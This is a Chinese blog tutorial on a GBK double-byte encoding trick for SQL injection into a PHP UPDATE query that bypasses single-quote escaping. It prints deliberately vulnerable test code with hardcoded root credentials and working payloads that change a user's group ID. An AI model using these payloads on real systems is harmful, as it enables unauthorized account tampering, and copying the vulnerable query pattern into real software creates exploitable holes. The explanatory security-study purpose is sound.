双字节编码绕PHP单引号转义又一例: SQL UPDATE注入

最新推荐文章于 2024-05-29 14:48:41 发布
最新推荐文章于 2024-05-29 14:48:41 发布
阅读量720 收藏
点赞数
分类专栏: Web类

原理和《利用双字节编码突破PHP单引号转义限制进行SQL注入》 是一样的。


view plaincopy to clipboardprint?
<?php   
 
// by redice 2010.10.21  
 
// 连接mysql数据库  
$conn=0;  
$conn = mysql_connect("localhost","root","redice2009");  
if (!$conn)  
{  
  die("不能打开数据库连接,错误: " . mysql_error());  
}  
 
// 选择数据库  
mysql_select_db("test", $conn);  
 
// 设置mysql数据库输出数据的字符集  
mysql_query("set names 'gbk'");  
 
 
 
// 修改密码过程  
 
$newpass=$_REQUEST[p];  
 
 
$sql = "update user set pass='$newpass' where name='redice'";  
echo "执行的查询=".$sql."</br>";  
 
if(!mysql_query($sql,$conn))  
{  
      
    echo mysql_error();  
}  
 
?> 

<?php

// by redice 2010.10.21

// 连接mysql数据库
$conn=0;
$conn = mysql_connect("localhost","root","redice2009");
if (!$conn)
{
  die("不能打开数据库连接,错误: " . mysql_error());
}

// 选择数据库
mysql_select_db("test", $conn);

// 设置mysql数据库输出数据的字符集
mysql_query("set names 'gbk'");

 

// 修改密码过程

$newpass=$_REQUEST[p];


$sql = "update user set pass='$newpass' where name='redice'";
echo "执行的查询=".$sql."</br>";

if(!mysql_query($sql,$conn))
{
   
    echo mysql_error();
}

?>

 

(1)在gpc=off的情况下。

提交p=123',groupid='1  SQL语句变为:

update user set pass='123',groupid='1' where name='redice'

(2)在gpc=on的情况下。

利用GBK双字节编码,可以绕过单引号转义。

分析如下:

提交p=123%d5',groupid=1 where id=1%23

浏览器url编码后为:

p=123%d5%27,groupid=1%20where%20id=1%23

再经PHP url解码后为:

p=1230xd50x27,groupid=10x20where0x20id=10x23

再经PHP转义后为(在0x27前插入0x5c):

p=1230xd50x5c0x27,groupid=10x20where0x20id=10x23

由于服务端采用gbk编码连接数据库(set names 'gbk'),因此上述字节序列被MySQL作为GBK字符理解后即为:

p=123誠',groupid=1 where id=1#   

PS:0xd50x5c 对应了汉字誠,从而吃掉了单引号,绕过转义

最终SQL语句变为:

update user set pass='123誠',groupid=1 where id=1#' where name='redice'


PS:%23解码后为#,用以注释之后的SQL语句,使之符合语法规范。

 


 \

mydriverc2
关注
专栏目录
字节注入---GBK字节绕过
糖小喵
04-21 904
原理 addslashes() 函数返回在预定义字符之前添加反斜杠的字符串 在mysql中,用于转义(即在字符串中的符号前加上”\”)的函数有addslashes,mysql_real_escape_string,mysql_escape_string等,还有一种情况是magic_quote_gpc,不过高版本的PHP将去除这个特性。 mysql 在使用 GBK 编码的时候, 会认为两个字符...
php单引号绕过,SQL注入绕过PHP单引号字符转义原理及预防方法
weixin_33829335的博客
04-10 863
http://mo47.com/blog/2011/sql_injection_gpc利用GBK字节编码绕过单引号转义附赠工具一款:PHP汉字url编码转换器PHP测试代码如下/* 注入实验:start */$id = $_GET['id'];//建立连接$conn = false;$conn = mysql_connect("localhost","root","");mysql_query...
SQL注入绕过 单引号 限制继续注入
10-29
我想不少人都看过一些关于SQL Injection针对SQL Server攻击的文章,都是因为变量过滤不足甚至没有过滤而构造畸形SQL语句注入
php中的echo单引号_php中的单引号引号和转义字符详解
weixin_33018713的博客
02-02 704
PHP单引号引号均可以修饰字符串类型的数据,如果修饰的字符串中含有变量(例$name);最大的区别是: 引号会替换变量的值,而单引号会把它当做字符串输出。例如: ...
利用GBK字节编码突破PHP单引号转义限制进行SQL注入
Exploit的小站~
04-11 2979
今天看了黑防2009精华本下册《字节编码PHP的隐形杀手》一文,深受启发。 当php.ini中magic_quotes_gpc被设置为on时,提交的参数会被转义,例如,单引号会被转义成了'。一下子截断了字符型注入的路。 GBK字节编码:一个汉字用两个字节表示,首字节对应0x81-0xFE,尾字节对应0x40-0xFE(除0x7F),刚好涵盖了对应的编码0x5C。 0xD5 0
sql注入详解
m0_73109590的博客
08-03 1017
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。...
mysql sql注入漏洞修复_SQL注入漏洞解析与靶场复现
weixin_36043375的博客
02-26 1277
1. 概述SQL注入(SQL Injectioin)漏洞是注入漏洞中危害性最高的漏洞之一。形成的原因主要是在数据交互过程中,前端的数据传入后端时,没有作严格的验证过滤导致传入的“数据”拼接到了SQL语句中。被数据库当作SQL语句的一部分执行,从而使得数据面临被脱库、恶意破坏篡改甚至造成整个系统权限沦陷等一系列危害。注入攻击的本质是把用户输入的数据当作代码执行。造成注入攻击有两个关键条件:①用户能够...
sql注入
zejiiii的博客
02-15 3066
SQL注入注入分类 注入点分类 数字型注入 字符型注入 提交方式分类 提交方式分类 GET 方式注入 POST 方式注入 COOKIE 方式注入 HTTP 头部注入:XFF,UA,REFRERE 是否回显 联合查询 布尔盲注 报错注入 时间盲注 二次注入 堆叠查询(同时执行多条语句) 二 注入判断 工具扫描:网站漏扫工具,AWVS、AppScan、OWASP-ZAP、Nes
SQL注入
SK1ng的博客
09-12 3049
SQL注入 产生原理 参数的传递 数据的接收 数据的交互 数据库的执行 这四个步骤处理不当时,会产生注入点 通过参数传递一个数据,传入的数据直接拼接到之前定义好的SQL语句中,由于未作过滤,可以将一些传递恶意SQL进行拼接,达到执行恶意SQL语句的效果 产生条件 可控变量 可控变量带入数据库查询 变量无过滤或过滤不严谨 危害 可以对数据库进行增、删、改、查等操作 一定条件情况下可以通过注入点直接获取权限 数据库类型 MySQL 注入点 ?example and 1=1 页面正常 ?example
php 拼接 单引拼接,字节编码PHP单引号转义一例SQL UPDATE注入
weixin_28999575的博客
03-11 253
原理和《利用字节编码突破PHP单引号转义限制进行SQL注入》http://www.redicecn.com/view-256.html是一样的。// by redice 2010.10.21// 连接mysql数据库$conn=0;$conn = mysql_connect("localhost","root","redice2009");if (!$conn){die("不能打开数据库连接...
php输出字符串单引号,如何使用php在字符串中转义单引号(撇号)
weixin_42470969的博客
03-10 440
答案是你不需要.使用PDO准备的正确方法是这样的:$stmt = $pdo->prepare("SELECT * FROM `products_keywords` WHERE `product_type` = ?");这是使用预备声明的重点.然后你bind的参数如下:$stmt->bindParam(1, $product_type)证明,架构:create table `produc...
SQL注入 引号转义绕过
Auroraxsn的博客
04-25 1万+
问题描述 做了一个靶场,注入点为数字类型,一开始一帆风顺,直到爆破列名的时候突然报错,页面突然就没了,毫无征兆...报错时的url如下: ?id=1 and 1=2 union select column_name,null,null,null,null from information_schema.columns where table_schema=database() and table_name="users" 查看源码: $sql="SELECT * FROM users wher
sql注入(8), 常见注入绕过技巧
探测???
10-16 449
select hex(‘/etc/passwd’) # 输出: 2F6574632F706173737764。绕过后端对 select, and, or 等关键字的过滤, 比如替换关键字为空.select hex(‘learn’) # 输出: 6C6561726E。闭合: id=‘1’ or ‘1’=‘1’闭合: id=‘1’ || ‘1’=‘1’selselectect 替换后: select。anandd 替换后: and。用 ||, && 代替 or, and。
SQL注入漏洞(绕过篇)
errorr0
06-24 4914
SQL注入绕过手法
记一次艰难的SQL注入(过安全狗)
最新发布
白帽子凯哥聊黑客
05-29 1450
实战注入的难度比靶场大得多,各种绕过,各种骚操作。要学会利用搜索工具,更要学会选择性放弃。当一条路走不通就换另一种方法,也许就会柳暗花明又一村。网络安全学习资源分享:给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,需要点击下方链接即可前往获取。
SQL注入绕过PHP单引号字符转义原理及预防方法
热门推荐
MyDriverC
01-05 2万+
PHP测试代码如下 /* 注入实验:start */ $id = $_GET['id']; //建立连接 $conn = false; $conn = mysql_connect("localhost","root",""); mysql_query("set names 'gbk'"); mysql_select_db("test", $conn);  //执行 $sql
update 更新的值中存在单引号
sustwct的专栏
08-27 9562
更新的值为:'1461','1462','1501','1463','1464','1465','1466','1467','1468','1469','1470','1471','1472','1481' update sys_user set  localids='''1461'',''1462'',''1501'',''1463'',''1464'',''1465'',''1466'','
字节字节的转换
preston2006的专栏
03-08 4895
CString 与 char* WCHAR之间的转换 char* 转 WCHAR可以如下转换: char szFormat[1024];  WCHAR* szForMat;   USES_CONVERSION;   CString csTmp = A2T(szMsg);   szForMat = csTmp.GetBuffer();   其中A2T和T2A比较好用 char*
sql注入引号转义绕过
04-20
其中,注入引号转义绕过是一种常见的注入技巧。 在SQL语句中,引号通常用于表示字符串值。当应用程序没有对用户输入的数据进行正确的处理和转义时,攻击者可以通过在输入中插入特殊字符来绕过引号的限制,从而注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值